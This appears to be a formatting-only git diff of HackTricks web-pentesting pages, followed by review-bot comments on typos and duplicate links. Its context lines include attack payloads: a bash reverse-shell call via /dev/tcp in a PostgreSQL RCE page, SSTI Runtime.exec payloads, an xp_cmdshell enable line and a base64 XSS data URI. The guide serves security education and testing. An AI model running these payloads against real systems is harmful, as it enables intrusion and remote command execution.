@@ -244,6 +244,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999) ### JWT Registered claims + {{#ref}} https://www.iana.org/assignments/jwt/jwt.xhtml#claims {{#endref}} @@ -264,9 +265,9 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are ### Tools + {{#ref}} https://github.com/ticarpi/jwt_tool {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md index cd5d0dfab..faf47cdc2 100644 --- a/src/pentesting-web/hacking-with-cookies/README.md +++ b/src/pentesting-web/hacking-with-cookies/README.md @@ -64,6 +64,7 @@ This avoids the **client** to access the cookie (Via **Javascript** for example: - Another way is the exploitation of zero/day vulnerabilities of the browsers. - It's possible to **overwrite HttpOnly cookies** by performing a Cookie Jar overflow attack: + {{#ref}} cookie-jar-overflow.md {{#endref}} @@ -115,6 +116,7 @@ In this scenario, an attacker tricks a victim into using a specific cookie to lo If you found an **XSS in a subdomain** or you **control a subdomain**, read: + {{#ref}} cookie-tossing.md {{#endref}} @@ -125,6 +127,7 @@ Here, the attacker convinces the victim to use the attacker's session cookie. Th If you found an **XSS in a subdomain** or you **control a subdomain**, read: + {{#ref}} cookie-tossing.md {{#endref}} @@ -328,4 +331,3 @@ There should be a pattern (with the size of a used block). So, knowing how are a {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md index 14136ce78..09fef92f0 100644 --- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md +++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md 
@@ -37,6 +37,7 @@ Possible protection against this attack would be that the **web server won't acc To bypass the scenario where the attacker is setting a cookie after the victim was already given the cookie, the attacker could cause a **cookie overflow** and then, once the **legit cookie is deleted, set the malicious one**. + {{#ref}} cookie-jar-overflow.md {{#endref}} @@ -47,6 +48,7 @@ Another useful **bypass** could be to **URL encode the name of the cookie** as s A Cookie Tossing attack may also be used to perform a **Cookie Bomb** attack: + {{#ref}} cookie-bomb.md {{#endref}} @@ -68,4 +70,3 @@ cookie-bomb.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md index 0638cbfa9..7809e8033 100644 --- a/src/pentesting-web/http-request-smuggling/README.md +++ b/src/pentesting-web/http-request-smuggling/README.md @@ -200,6 +200,7 @@ Connection: Content-Length For **more information about hop-by-hop headers** visit: + {{#ref}} ../abusing-hop-by-hop-headers.md {{#endref}} @@ -628,6 +629,7 @@ Content-Length: 50 Have you found some HTTP Request Smuggling vulnerability and you don't know how to exploit it. Try these other method of exploitation: + {{#ref}} ../http-response-smuggling-desync.md {{#endref}} @@ -636,12 +638,14 @@ Have you found some HTTP Request Smuggling vulnerability and you don't know how - Browser HTTP Request Smuggling (Client Side) + {{#ref}} browser-http-request-smuggling.md {{#endref}} - Request Smuggling in HTTP/2 Downgrades + {{#ref}} request-smuggling-in-http-2-downgrades.md {{#endref}} @@ -762,4 +766,3 @@ def handleResponse(req, interesting): {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md index 1b65ea692..186d74ac2 100644 --- a/src/pentesting-web/ldap-injection.md +++ b/src/pentesting-web/ldap-injection.md 
@@ -8,6 +8,7 @@ **If you want to know what is LDAP access the following page:** + {{#ref}} ../network-services-pentesting/pentesting-ldap.md {{#endref}} @@ -215,9 +216,9 @@ intitle:"phpLDAPadmin" inurl:cmd.php ### More Payloads + {{#ref}} https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md index 02ccc2548..d6d2ce204 100644 --- a/src/pentesting-web/login-bypass/README.md +++ b/src/pentesting-web/login-bypass/README.md @@ -29,6 +29,7 @@ If you find a login page, here you can find some techniques to try to bypass it: In the following page you can find a **custom list to try to bypass login** via SQL Injections: + {{#ref}} sql-login-bypass.md {{#endref}} @@ -99,4 +100,3 @@ Pages usually redirects users after login, check if you can alter that redirect {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index 90989a6ff..63c3d1062 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -157,6 +157,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html {{#endref}} diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 8735718dc..2cbc9d4e6 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -7,6 +7,7 @@ ### Redirect to localhost or arbitrary domains + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -187,4 +188,3 @@ exit; {{#include ../banners/hacktricks-training.md}} - 
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md index dc7bedc19..de19a76d9 100644 --- a/src/pentesting-web/postmessage-vulnerabilities/README.md +++ b/src/pentesting-web/postmessage-vulnerabilities/README.md @@ -138,6 +138,7 @@ Consequently, when a popup is opened under these conditions and a message is sen For more information **read**: + {{#ref}} bypassing-sop-with-iframes-1.md {{#endref}} @@ -157,6 +158,7 @@ You can force **`e.source`** of a message to be null by creating an **iframe** t For more information **read:** + {{#ref}} bypassing-sop-with-iframes-2.md {{#endref}} @@ -177,6 +179,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000); In the following page you can see how you could steal a **sensitive postmessage data** sent to a **child iframe** by **blocking** the **main** page before sending the data and abusing a **XSS in the child** to **leak the data** before it's received: + {{#ref}} blocking-main-page-to-steal-postmessage.md {{#endref}} @@ -185,6 +188,7 @@ blocking-main-page-to-steal-postmessage.md If you can iframe a webpage without X-Frame-Header that contains another iframe, you can **change the location of that child iframe**, so if it's receiving a **postmessage** sent using a **wildcard**, an attacker could **change** that iframe **origin** to a page **controlled** by him and **steal** the message: + {{#ref}} steal-postmessage-modifying-iframe-location.md {{#endref}} @@ -237,4 +241,3 @@ For **more information**: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md index 62ffec5fb..21dde210c 100644 --- a/src/pentesting-web/proxy-waf-protections-bypass.md +++ b/src/pentesting-web/proxy-waf-protections-bypass.md 
@@ -176,6 +176,7 @@ These kind of context problems can also be used to **abuse other vulnerabilities ### H2C Smuggling + {{#ref}} h2c-smuggling.md {{#endref}} @@ -228,4 +229,3 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md index 738d4bf24..44a7aafee 100644 --- a/src/pentesting-web/registration-vulnerabilities.md +++ b/src/pentesting-web/registration-vulnerabilities.md @@ -31,12 +31,14 @@ In that case you may try to bruteforce credentials. ### Oauth Takeovers + {{#ref}} oauth-to-account-takeover.md {{#endref}} ### SAML Vulnerabilities + {{#ref}} saml-attacks/ {{#endref}} @@ -171,6 +173,7 @@ JSON Web Token might be used to authenticate an user. - Edit the JWT with another User ID / Email - Check for weak JWT signature + {{#ref}} hacking-jwt-json-web-tokens.md {{#endref}} @@ -182,4 +185,3 @@ hacking-jwt-json-web-tokens.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md index c8b4cbc3c..6cabbd575 100644 --- a/src/pentesting-web/reset-password.md +++ b/src/pentesting-web/reset-password.md @@ -134,6 +134,7 @@ POST /api/changepass - If UUIDs (version 1) are guessable or predictable, attackers may brute-force them to generate valid reset tokens. Check: + {{#ref}} uuid-insecurities.md {{#endref}} @@ -253,4 +254,3 @@ uuid-insecurities.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md index 6e68052da..4b30a6e1c 100644 --- a/src/pentesting-web/saml-attacks/README.md +++ b/src/pentesting-web/saml-attacks/README.md @@ -4,6 +4,7 @@ ## Basic Information + {{#ref}} saml-basics.md {{#endref}} 
@@ -123,6 +124,7 @@ You can use the Burp extension [**SAML Raider**](https://portswigger.net/bappsto If you don't know which kind of attacks are XXE, please read the following page: + {{#ref}} ../xxe-xee-xml-external-entity.md {{#endref}} @@ -157,6 +159,7 @@ Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www. For more information about XSLT go to: + {{#ref}} ../xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}} @@ -304,4 +307,3 @@ with open("/home/fady/uberSAMLOIDAUTH") as urlList: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index d894c12f8..8a7488060 100644 --- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -229,6 +229,7 @@ XSLT file: Check the XSLT page: + {{#ref}} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}} @@ -241,6 +242,7 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt {{#endref}} diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 044d5da2b..b99b5d6e3 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md @@ -228,6 +228,7 @@ Also, if you have access to the output of the query, you could make it **print t ### Identifying with PortSwigger + {{#ref}} https://portswigger.net/web-security/sql-injection/cheat-sheet {{#endref}} 
@@ -373,6 +374,7 @@ Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, List to try to bypass the login functionality: + {{#ref}} ../login-bypass/sql-login-bypass.md {{#endref}} @@ -621,6 +623,7 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ### WAF bypass suggester tools + {{#ref}} https://github.com/m4ll0k/Atlas {{#endref}} @@ -632,6 +635,7 @@ https://github.com/m4ll0k/Atlas ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt {{#endref}} diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md index f700872c7..512b2ea35 100644 --- a/src/pentesting-web/sql-injection/mssql-injection.md +++ b/src/pentesting-web/sql-injection/mssql-injection.md @@ -113,6 +113,7 @@ Additionally, there are alternative stored procedures like `master..xp_fileexist Obviously you could also use **`xp_cmdshell`** to **execute** something that triggers a **SSRF**. For more info **read the relevant section** in the page: + {{#ref}} ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ {{#endref}} @@ -272,4 +273,3 @@ exec('sp_configure''xp_cmdshell'',''1''reconfigure')-- {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md index 5ad3537f9..ef020bdd2 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md @@ -19,6 +19,7 @@ You can [**read this example**](dblink-lo_import-data-exfiltration.md) to see a Check how to compromise the host and escalate privileges from PostgreSQL in: + {{#ref}} ../../../network-services-pentesting/pentesting-postgresql.md {{#endref}} @@ -91,4 +92,3 @@ SELECT $TAG$hacktricks$TAG$; {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index f57342ec3..52b052578 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -135,6 +135,7 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"'); You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with: + {{#ref}} https://github.com/Dionach/pgexec {{#endref}} @@ -294,6 +295,7 @@ A significant vulnerability arises from the `CREATE FUNCTION` command, which **p First of all you need to **use large objects to upload the dll**. You can see how to do that here: + {{#ref}} big-binary-files-upload-postgresql.md {{#endref}} diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md index d6cae5dfb..ceef84312 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md @@ -309,6 +309,7 @@ SELECT req3('https://google.com'); #Request using python3 Check the following page: + {{#ref}} pl-pgsql-password-bruteforce.md {{#endref}} @@ -317,6 +318,7 @@ pl-pgsql-password-bruteforce.md Check the following page: + {{#ref}} rce-with-postgresql-extensions.md {{#endref}} @@ -324,4 +326,3 @@ rce-with-postgresql-extensions.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md index f42e88211..a3e873396 100644 
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -24,6 +24,7 @@ The first thing you need to do is to capture a SSRF interaction generated by you Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**: + {{#ref}} url-format-bypass.md {{#endref}} @@ -159,6 +160,7 @@ Create several sessions and try to download heavy files exploiting the SSRF from Check the following page for vulnerable PHP and even Wordpress functions: + {{#ref}} ../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md {{#endref}} @@ -283,6 +285,7 @@ Connection: close If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation: + {{#ref}} ../cors-bypass.md {{#endref}} @@ -362,6 +365,7 @@ Note that this is interesting to leak status codes that you couldn't leak before If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials: + {{#ref}} cloud-ssrf.md {{#endref}} @@ -370,6 +374,7 @@ cloud-ssrf.md Several known platforms contains or has contained SSRF vulnerabilities, check them in: + {{#ref}} ssrf-vulnerable-platforms.md {{#endref}} @@ -405,6 +410,7 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP ### To practice + {{#ref}} https://github.com/incredibleindishell/SSRF_Vulnerable_Lab {{#endref}} diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md index 0cc6dc336..6f5e61964 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md 
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md @@ -6,6 +6,7 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a - SugarCRM ≤ 14.0.0 – LESS `@import` injection in `/rest/v10/css/preview` enables unauthenticated SSRF & local file read. + {{#ref}} ../less-code-injection-ssrf.md {{#endref}} @@ -13,4 +14,3 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index d200804c8..c0b185f78 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -168,6 +168,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header. + {{#ref}} https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet {{#endref}} diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index fab420745..990860895 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md 
@@ -221,6 +221,7 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')}) - [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/) + {{#ref}} el-expression-language.md {{#endref}} @@ -285,6 +286,7 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x - [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation) + {{#ref}} el-expression-language.md {{#endref}} @@ -426,6 +428,7 @@ Expression Language (EL) is a fundamental feature that facilitates interaction b Check the following page to learn more about the **exploitation of EL interpreters**: + {{#ref}} el-expression-language.md {{#endref}} @@ -863,6 +866,7 @@ home = pugjs.render(injected_page) Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -961,6 +965,7 @@ Check out the following page to learn tricks about **arbitrary command execution **More details about how to abuse Jinja**: + {{#ref}} jinja2-ssti.md {{#endref}} @@ -1115,6 +1120,7 @@ If you think it could be useful, read: ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt {{#endref}} diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index 34471afbc..d9f6d73e5 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md 
@@ -177,6 +177,7 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o To learn about **more classes** that you can use to **escape** you can **check**: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -363,4 +364,3 @@ The request will be urlencoded by default according to the HTTP format, which ca {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md index b07b8ffa5..143f2116f 100644 --- a/src/pentesting-web/unicode-injection/README.md +++ b/src/pentesting-web/unicode-injection/README.md @@ -13,6 +13,7 @@ Unicode normalization occurs when **unicode characters are normalized to ascii c One common scenario of this type of vulnerability occurs when the system is **modifying** somehow the **input** of the user **after having checked it**. For example, in some languages a simple call to make the **input uppercase or lowercase** could normalize the given input and the **unicode will be transformed into ASCII** generating new characters.\ For more info check: + {{#ref}} unicode-normalization.md {{#endref}} @@ -66,4 +67,3 @@ In the blog post there are proposed methods to bypass vulnerabilities fixed usin {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md index 4998d5941..05d1c7d57 100644 --- a/src/pentesting-web/unicode-injection/unicode-normalization.md +++ b/src/pentesting-web/unicode-injection/unicode-normalization.md @@ -79,6 +79,7 @@ Then, a malicious user could insert a different Unicode character equivalent to #### sqlmap template + {{#ref}} https://github.com/carlospolop/sqlmap_to_unicode_template {{#endref}} 
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md index 0f2ba13e1..5dc2c81b6 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology.md +++ b/src/pentesting-web/web-vulnerabilities-methodology.md @@ -47,6 +47,7 @@ If the introduced data may somehow be reflected in the response, the page might Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: + {{#ref}} pocs-and-polygloths-cheatsheet/ {{#endref}} diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md index 27ab5169d..eaaf2388b 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology/README.md +++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md @@ -46,6 +46,7 @@ If the introduced data may somehow be reflected in the response, the page might Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: + {{#ref}} ../pocs-and-polygloths-cheatsheet/ {{#endref}} @@ -129,4 +130,3 @@ These vulnerabilities might help to exploit other vulnerabilities. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md index 112022aae..e5ed39a33 100644 --- a/src/pentesting-web/websocket-attacks.md +++ b/src/pentesting-web/websocket-attacks.md 
@@ -195,6 +195,7 @@ As Web Sockets are a mechanism to **send data to server side and client side**, This vulnerability could allow you to **bypass reverse proxies restrictions** by making them believe that a **websocket communication was stablished** (even if it isn't true). This could allow an attacker to **access hidden endpoints**. For more information check the following page: + {{#ref}} h2c-smuggling.md {{#endref}} @@ -207,4 +208,3 @@ h2c-smuggling.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md index 0f328728d..6471d3166 100644 --- a/src/pentesting-web/xs-search.md +++ b/src/pentesting-web/xs-search.md @@ -69,6 +69,7 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https:// - **Summary**: if trying to load a resource onerror/onload events are triggered with the resource is loaded successfully/unsuccessfully it's possible to figure out the status code. - **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)]() + {{#ref}} xs-search/cookie-bomb-+-onerror-xs-leak.md {{#endref}} @@ -93,6 +94,7 @@ In this case if `example.com/404` is not found `attacker.com/?error` will be loa - **Summary:** The [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** can be used to measure how much time it takes to perform a request. However, other clocks could be used, such as [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) which can identify tasks running for more than 50ms. - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) another example in: + {{#ref}} xs-search/performance.now-example.md {{#endref}} 
@@ -101,6 +103,7 @@ xs-search/performance.now-example.md This technique is just like the previous one, but the **attacker** will also **force** some action to take a **relevant amount time** when the **answer is positive or negative** and measure that time. + {{#ref}} xs-search/performance.now-+-force-heavy-task.md {{#endref}} @@ -159,6 +162,7 @@ Then, you can **distinguish between** a **correctly** loaded page or page that h - **Summary:** If the **page** is **returning** the **sensitive** content, **or** a **content** that can be **controlled** by the user. The user could set **valid JS code in the negative case**, an **load** each try inside **`
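Review bot: In the exploiting-__viewstate-parameter.md hunk (`@@ -265,10 +265,7 @@`), the removed `{{#ref}}` ... `{{#endref}}` pair had no target at all between the two markers, so dropping it and keeping only the "Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372" sentence is the right fix; please confirm no reference was meant to go there, since the section now ends with that sentence directly before `## References` and the other hunks in this change only add targets, never remove them.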
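Review bot: In the hacking-with-cookies/README.md hunks (`@@ -115,6 +116,7 @@` and `@@ -125,6 +127,7 @@`), the same paragraph "If you found an **XSS in a subdomain** or you **control a subdomain**, read:" followed by `{{#ref}} cookie-tossing.md {{#endref}}` appears twice, ten lines apart, and this change adds the blank line to both copies rather than deduplicating; since the file is being touched anyway, keep one copy (or make the second one a short "see the cookie tossing section above") so readers are not sent to the same page twice in consecutive sections.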
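Review bot: In the file-inclusion/README.md hunk (`@@ -414,6 +416,7 @@`), the context line `[Phar Deserialization Exploitation Guide](phar-deserialization.md)` is immediately followed by `{{#ref}} phar-deserialization.md {{#endref}}`, so the same page is linked twice in a row with two different mechanisms; drop the inline markdown link and keep only the `{{#ref}}` block, which is the convention every other hunk in this change normalizes toward.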
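Review bot: In the ssrf-server-side-request-forgery/README.md hunk (`@@ -283,6 +285,7 @@`), the context line reads "**DNS Rebidding** can be used to bypass that limitation"; the technique referenced by `../cors-bypass.md` is DNS Rebinding, and the misspelling sits in a bolded term that readers will search for, so fix it to "DNS Rebinding" while this paragraph is being edited.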
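Review bot: In the xs-search.md hunk (`@@ -69,6 +69,7 @@`), the context line `- **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)]()` is a markdown link with an empty `()` target, so it renders as a dead link even though the visible text is the intended URL; either use the URL as the link target as well or turn it into a bare URL, since the new `{{#ref}}` block added just below only points at `xs-search/cookie-bomb-+-onerror-xs-leak.md` and does not replace this external reference.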
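Review bot: In the websocket-attacks.md hunk (`@@ -195,6 +195,7 @@`), the context line "making them believe that a **websocket communication was stablished**" should read "established"; it is a bolded phrase in the sentence that introduces the `h2c-smuggling.md` reference this change adds a blank line before, so it is worth correcting in the same edit.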